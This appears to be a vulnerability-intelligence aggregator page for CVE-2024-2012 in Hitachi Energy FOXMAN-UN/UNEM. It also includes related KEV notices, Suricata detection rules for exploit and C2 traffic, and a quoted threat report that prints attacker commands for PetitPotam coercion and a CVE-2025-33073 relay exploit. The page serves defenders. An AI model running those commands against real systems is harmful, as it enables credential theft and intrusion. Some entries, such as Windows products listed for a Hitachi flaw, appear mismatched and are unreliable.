CVE-2024-2012
Published: 2024-06-11
Priority: P3 (55) · Severity: critical · CVSS 3.1 base score: 9.8
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.60% (44.3rd percentile)
A vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway that, if exploited, could allow an attacker to execute unintended commands or code on the UNEM server, allowing sensitive data to be read or modified or causing other unintended behavior.
Affected
35 ranges (showing 25)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hitachi_energy | foxman-un | — | — |
| hitachi_energy | foxman-un | — | — |
| hitachi_energy | foxman-un | — | — |
| hitachi_energy | foxman-un | — | — |
| hitachi_energy | unem | — | — |
| hitachi_energy | unem | — | — |
| hitachi_energy | unem | — | — |
| hitachi_energy | unem | — | — |
| hitachi_energy | unem | — | — |
| hitachienergy | foxman-un | — | — |
| hitachienergy | foxman-un | — | — |
| hitachienergy | foxman-un | — | — |
| hitachienergy | foxman-un | — | — |
| hitachienergy | unem | — | — |
| hitachienergy | unem | — | — |
| hitachienergy | unem | — | — |
| hitachienergy | unem | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1809 | — | — |
| msrc | windows_10_version_21h2 | — | — |
| msrc | windows_10_version_22h2 | — | — |
| msrc | windows_11_version_21h2 | — | — |
| msrc | windows_11_version_22h2 | — | — |
| msrc | windows_11_version_23h2 | — | — |
CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd | 9.8 (v3.1) | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | 10.0 | CRITICAL | — |
| cisa | 8.8 | HIGH | — |
| vendor_msrc | 9.8 | CRITICAL | — |
| vendor_redhat | 5.5 | MEDIUM | — |
GHSA
GHSA-73c8-ph6w-g64x · ghsa_unreviewed · 2024-06-11
CVE-2024-2012 [CRITICAL] CWE-288
A vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway that, if exploited, could allow an attacker to execute unintended commands or code on the UNEM server, allowing sensitive data to be read or modified or causing other unintended behavior.
VulnCheck
CVE-2024-3400 [CRITICAL] CWE-20 Palo Alto Networks PAN-OS Command Injection Vulnerability
vulncheck · 2024 · CVSS 10.0
Palo Alto Networks PAN-OS GlobalProtect feature contains a command injection vulnerability that allows an unauthenticated attacker to execute commands with root privileges on the firewall.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply mitigations per vendor instructions as they become available. Otherwise, users with vulnerable versions of affected devices should enable Threat Prevention IDs available from the vendor. See the vendor bulletin for more details and a patch release schedule.
Known Ransomware Campaign Use: Known
Exploitation References: https://security.paloaltonetworks.com/CVE-2024-3400; https://unit42.paloaltonetworks.com/cve-2024-3400/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_v
VulnCheck
CVE-2024-47575 [CRITICAL] CWE-306 Fortinet FortiManager Missing Authentication Vulnerability
vulncheck · 2024 · CVSS 9.8
Fortinet FortiManager contains a missing authentication vulnerability in the fgfmd daemon that allows a remote, unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.
Affected: Fortinet FortiManager
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortiguard.com/psirt/FG-IR-24-423; https://www.runzero.com/blog/fortinet-fortimanager/; https://darktrace.com/blog/post-exploitation-activities
VulnCheck
CVE-2024-0012 [CRITICAL] CWE-306 Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
vulncheck · 2024 · CVSS 9.3
Palo Alto Networks PAN-OS contains an authentication bypass vulnerability in the web-based management interface for several PAN-OS products, including firewalls and VPN concentrators.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, management interface for affected devices should not be exposed to untrusted networks, including the internet.
Known Ransomware Campaign Use: Known
Exploitation References: https://security.paloaltonetworks.com/CVE-2024-0012; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statist
VulnCheck
CVE-2024-9474 [MEDIUM] CWE-77 Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
vulncheck · 2024 · CVSS 6.9
Palo Alto Networks PAN-OS contains an OS command injection vulnerability that allows for privilege escalation through the web-based management interface for several PAN products, including firewalls and VPN concentrators.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable. Additionally, the management interfaces for affected devices should not be exposed to untrusted networks, including the internet.
Known Ransomware Campaign Use: Known
Exploitation References: https://security.paloaltonetworks.com/CVE-2024-9474; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json;
CISA ICS
[HIGH] Hitachi Energy UNEM
cisa_ics · 2025-01-30 · CVSS 8.6
ICS Advisory
Release Date: January 30, 2025
Alert Code: ICSA-25-030-01
Related topics: Industrial Control System Vulnerabilities, Industrial Control Systems
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Hitachi Energy
- Equipment: UNEM
- Vulnerabilities: Authentication Bypass Using an Alternate Path or Channel, Argument Injection, Heap-based Buffer Overflow, Improper Certificate Validation, Use of Hard-coded Password, Improper Restriction of Excessive Authentication Attempts, Cleartext Storage of Sensitive Information, Incorrect User Management
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to cause a denial of service,
CISA ICS
[HIGH] Hitachi Energy FOXMAN-UN
cisa_ics · 2025-01-14 · CVSS 8.6
ICS Advisory
Release Date: January 14, 2025
Alert Code: ICSA-25-014-01
Related topics: Industrial Control System Vulnerabilities, Industrial Control Systems
## 1. EXECUTIVE SUMMARY
- CVSS v3 10.0
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Hitachi Energy
- Equipment: FOXMAN-UN
- Vulnerabilities: Authentication Bypass Using an Alternate Path or Channel, Improper Neutralization of Argument Delimiters in a Command ('Argument Injection'), Heap-based Buffer Overflow, Incorrect User Management, Improper Certificate Validation, Improper Restriction of Excessive Authentication Attempts, Use of Hard-coded Password, Cleartext Storage of Sensitive Information
## 2. RISK EVALUATION
Successful exploitation of t
CISA
CVE-2012-4792 [HIGH] CWE-416 Microsoft Internet Explorer Use-After-Free Vulnerability
cisa · 2024-07-23 · CVSS 8.8
Affected: Microsoft Internet Explorer
Microsoft Internet Explorer contains a use-after-free vulnerability that allows a remote attacker to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object.
Required Action: The impacted product is end-of-life and should be disconnected if still in use.
Notes: https://learn.microsoft.com/en-us/lifecycle/products/internet-explorer-11; https://nvd.nist.gov/vuln/detail/CVE-2012-4792
Remediation Due Date: 2024-08-13
Suricata
CVE-2012-1823 ET WEB_SERVER PHP.//Input in HTTP POST
suricata · 2014-11-25
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER PHP.//Input in HTTP POST"; flow:established,to_server; http.method; content:"POST"; http.uri.raw; content:"php|3a 2f 2f|input"; fast_pattern; http.request_body; content:"<?"; startswith; reference:url,www.deependresearch.org/2014/07/another-linux-ddos-bot-via-cve-2012-1823.html; classtype:trojan-activity; sid:2019804; rev:5; metadata:created_at 2014_11_25, signature_severity Major, updated_at 2024_04_12;)
Suricata
CVE-2012-1823 [CRITICAL] ET MALWARE Bossabot DDoS tool RFI attempt
suricata · 2014-09-22 · CVSS 9.8
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET MALWARE Bossabot DDoS tool RFI attempt"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"php?-d|20|allow_url"; fast_pattern; content:"auto_prepend_file|3d|php|3a 2f|"; http.request_body; content:"<?php|0d 0a|"; startswith; reference:url,www.kernelmode.info/forum/viewtopic.php?f=16&t=3476&p=23965#p23965; reference:url,cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823; classtype:trojan-activity; sid:2019212; rev:5; metadata:created_at 2014_09_22, signature_severity Major, tag CISA_KEV, updated_at 2024_04_13;)
Suricata
CVE-2012-0158 ET MALWARE EvilGrab/Vidgrab Checkin
suricata · 2013-09-04
Rule: alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE EvilGrab/Vidgrab Checkin"; flow:established,to_server; content:"|7c 28|"; pcre:"/^\d{1,3}\x2e\d{1,3}\x2e\d{1,3}\x2e\d{1,3}/R"; content:"|29 7c|"; within:2; pcre:"/^\d{1,5}/R"; content:"|7c|Win"; within:4; reference:url,contagiodump.blogspot.com.br/2013/09/sandbox-miming-cve-2012-0158-in-mhtml.html; classtype:command-and-control; sid:2017413; rev:4; metadata:created_at 2013_09_04, signature_severity Major, updated_at 2024_03_06;)
Suricata
CVE-2012-6081 ET WEB_SPECIFIC_APPS MoinMoin twikidraw Action Traversal File Upload
suricata · 2013-06-28
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS MoinMoin twikidraw Action Traversal File Upload"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"?action=twikidraw"; fast_pattern; content:"&target="; distance:0; content:"../moin.wsgi"; endswith; reference:bugtraq,57082; reference:cve,2012-6081; reference:url,packetstormsecurity.com/files/122079/moinmoin_twikidraw.rb.txt; reference:url,exploit-db.com/exploits/25304/; classtype:web-application-attack; sid:2017074; rev:6; metadata:created_at 2013_06_28, cve CVE_2012_6081, signature_severity Major, updated_at 2024_03_06, reviewed_at 2024_02_06;)
Suricata
CVE-2012-1533 ET EXPLOIT Possible 2012-1533 altjvm RCE via JNLP command injection
suricata · 2013-06-13
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible 2012-1533 altjvm RCE via JNLP command injection"; flow:established,to_client; file.data; content:"<jnlp"; nocase; content:"initial-heap-size"; nocase; content:"max-heap-size"; content:"-XXaltjvm"; nocase; fast_pattern; reference:cve,2012-1533; classtype:trojan-activity; sid:2017013; rev:4; metadata:created_at 2013_06_13, cve CVE_2012_1533, confidence Medium, signature_severity Major, updated_at 2024_03_13, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
Suricata
CVE-2012-4792 [HIGH] ET MALWARE CFR DRIVEBY CVE-2012-4792 DNS Query for C2 domain
suricata · 2012-12-30 · CVSS 8.8
Rule: alert dns $HOME_NET any -> any any (msg:"ET MALWARE CFR DRIVEBY CVE-2012-4792 DNS Query for C2 domain"; dns.query; content:"provide.yourtrap.com"; startswith; fast_pattern; nocase; endswith; reference:cve,2012-4792; reference:url,github.com/rapid7/metasploit-framework/commit/6cb9106218bde56fc5e8d72c66fbba9f11c24449; reference:url,eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/; classtype:command-and-control; sid:2016135; rev:7; metadata:affected_product Any, attack_target Client_Endpoint, created_at 2012_12_30, cve CVE_2012_4792, deployment Perimeter, confidence Medium, signature_severity Major, tag DriveBy, tag CISA_KEV, updated_at 2024_04_13;)
Suricata
CVE-2012-2539 ET WEB_CLIENT Microsoft Rich Text File .RTF File download with invalid listoverridecount
suricata · 2012-12-12
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Rich Text File .RTF File download with invalid listoverridecount"; flow:established,to_client; file.data; content:"|5c|listoverridetable"; distance:0; content:"|5c|listoverride|5c|"; fast_pattern; content:"|5c|listoverridecount"; isdataat:2,relative; pcre:"/^(?:0*?[19]\d|[^190])/R"; reference:cve,2012-2539; classtype:attempted-user; sid:2018315; rev:7; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_12_12, cve CVE_2012_2539, deployment Perimeter, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_03_13;)
Suricata
CVE-2012-0183 ET WEB_CLIENT Microsoft Rich Text File download - SET
suricata · 2012-10-10
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Rich Text File download - SET"; flow:established,to_client; flowbits:set,ET.http.rtf.download; flowbits:noalert; file.data; content:"|7B 5C 72 74 66 31|"; within:6; reference:cve,2012-0183; classtype:attempted-user; sid:2015790; rev:4; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_10_10, cve CVE_2012_0183, deployment Perimeter, confidence Medium, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_03_14;)
Suricata
CVE-2012-0185 ET WEB_CLIENT Microsoft Excel file download - SET 1
suricata · 2012-05-10
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Excel file download - SET 1"; flow:established,to_client; flowbits:isset,OLE.CompoundFile; flowbits:set,ETPRO.Microsoft.Excel; flowbits:noalert; file.data; content:"|09 08 10 00 00 06 05 00|"; distance:512; content:"|57006F0072006B0062006F006F006B00|"; fast_pattern; reference:cve,2012-0185; classtype:attempted-user; sid:2025086; rev:9; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_05_10, cve CVE_2012_0185, deployment Perimeter, confidence Medium, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_03_14;)
Suricata
CVE-2012-0183 ET WEB_CLIENT Hostile Microsoft Rich Text File (RTF) with corrupted listoverride
suricata · 2012-05-08
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Hostile Microsoft Rich Text File (RTF) with corrupted listoverride"; flow:established,to_client; flowbits:set,ETPRO.RTF; file.data; content:"|7b 5c 2a 5c|listoverridetable"; content:"|5c|listoverride|5c|"; fast_pattern; pcre:"/\x5clistoverride\x5c((?!\x5cls\d{1,4}\s*\}).)+?\x5clistoverride\x5c/s"; reference:cve,2012-0183; classtype:attempted-user; sid:2025085; rev:5; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_05_08, cve CVE_2012_0183, deployment Perimeter, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_04_06;)
Suricata
CVE-2012-0152 ET DOS Microsoft Remote Desktop (RDP) Syn/Ack Outbound Flowbit Set
suricata · 2012-03-15
Rule: alert tcp $HOME_NET 3389 -> any any (msg:"ET DOS Microsoft Remote Desktop (RDP) Syn/Ack Outbound Flowbit Set"; flow:from_server; flowbits:isnotset,ms.rdp.synack; flowbits:set,ms.rdp.synack; flowbits:noalert; flags:SA; reference:cve,2012-0152; classtype:not-suspicious; sid:2014385; rev:6; metadata:created_at 2012_03_15, cve CVE_2012_0152, signature_severity Major, updated_at 2024_03_14;)
Suricata
CVE-2012-0003 ET WEB_CLIENT Microsoft Windows Media component specific exploit
suricata · 2012-01-28
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Windows Media component specific exploit"; flow:established,to_client; file.data; content:"bang()"; content:"cloned"; distance:0; content:"unescape(|22|%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c|22|)"; fast_pattern; distance:0; reference:cve,2012-0003; classtype:attempted-user; sid:2014156; rev:7; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2012_01_28, cve CVE_2012_0003, deployment Perimeter, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_04_08;)
Suricata
CVE-2011-3544 ET MALWARE Dooptroop CnC Beacon
suricata · 2012-01-10
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Dooptroop CnC Beacon"; flow:established,to_server; http.method; content:"GET"; http.uri; content:".php?num="; fast_pattern; content:"&rev="; distance:0; pcre:"/^\/[a-z]+\.php\?num=\d+&rev=/"; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,blog.eset.com/2012/03/17/drive-by-ftp-a-new-view-of-cve-2011-3544; classtype:command-and-control; sid:2014112; rev:7; metadata:attack_target Client_Endpoint, created_at 2012_01_10, deployment Perimeter, signature_severity Major, tag c2, updated_at 2024_04_20, mitre_tactic_id TA0010, mitre_tactic_name Exfiltration, mitre_technique_id T1041, mitre_technique_name Exfiltration_Over_C2_Channel;)
Suricata
CVE-2011-3416 ET WEB_SERVER ASP.NET Forms Authentication Bypass
suricata · 2012-01-03
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER ASP.NET Forms Authentication Bypass"; flow:established,to_server; http.uri; content:"/CreatingUserAccounts.aspx"; fast_pattern; http.request_body; content:"CreateUserStepContainer"; content:"UserName="; distance:0; content:"%00"; distance:0; pcre:"/UserName\x3d[^\x26]+\x2500/"; reference:cve,2011-3416; classtype:attempted-user; sid:2014100; rev:7; metadata:created_at 2012_01_03, cve CVE_2011_3416, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Pub
No public exploits indexed.
Microsoft
CVE-2025-33073 [HIGH] From edge appliance to enterprise compromise: Multi-stage Linux intrusion via F5 and Confluence
blogs_microsoft · 2026-05-22 · CVSS 8.8
After compromising the Confluence server, the threat actor obtained credentials and used them to attempt authentication against Windows infrastructure from the following files:
- /opt/atlassian/confluence/conf/server.xml
- /var/atlassian/application-data/confluence/confluence.cfg.xml
This was followed by Kerberos relay attacks and exploitation of CVE-2025-33073, highlighting the risk of credential theft from internal web applications and the importance of monitoring cross-system authentication events.
nxc smb [REDACTED_IP] -d [REDACTED_DOMAIN].com -u Jiraservices -p '********* -M coerce_plus -o M=PetitPotam L="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
python3 CVE-2025-33073.py -u [REDACTED_DOMAIN].com\Jiraservices -p ******** --attacker-ip [REDACTED_IP] --dns-ip [REDACTED_IP]
Bleepingcomputer
[HIGH] Microsoft fixes Linux boot issues on dual-boot Windows systems
blogs_bleepingcomputer · 2025-05-14 · CVSS 8.6
By Sergiu Gatlan
Microsoft has fixed a known issue preventing Linux from booting on dual-boot systems with Secure Boot enabled after installing the August 2024 Windows security updates.
The list of affected systems includes those running client (Windows 10 and Windows 11) and server (Windows Server 2012 and later) OS versions.
This issue is triggered by a Secure Boot Advanced Targeting (SBAT) update that blocks UEFI shim bootloaders vulnerable to exploits targeting the CVE-2022-2601 GRUB2 Secure Boot bypass.
While Microsoft said in the CVE-2022-2601 advisory that this SBAT update would not be delivered to devices where dual booting is detected, it also acknowledged that the dual-boot detection failed to detect some cust